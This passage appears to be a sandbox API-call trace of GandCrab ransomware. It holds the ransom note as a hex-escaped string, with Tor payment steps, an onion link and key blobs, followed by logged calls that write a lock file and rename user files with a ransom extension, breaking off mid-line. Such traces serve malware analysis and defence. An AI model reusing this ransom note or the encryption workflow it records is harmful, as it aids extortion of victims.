0\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.900] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0079.901] CloseHandle (hObject=0x2c4) returned 1 [0079.902] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.902] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.902] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0xda)) [0079.902] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.902] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.902] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.902] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a09d2ca4deb61a.lock") returned 92 [0079.902] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0079.903] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.903] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.903] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 68 [0079.903] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*" [0079.903] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503638 [0079.903] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.903] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.904] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.904] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.904] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0079.904] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.904] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.904] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a09d2ca4deb61a.lock" [0079.904] lstrlenW (lpString=".titwmvjl") returned 9 [0079.904] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a09d2ca4deb61a.lock") returned 92 [0079.904] VirtualAlloc (lpAddress=0x0, dwSize=0xf8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.904] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 101 [0079.904] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash 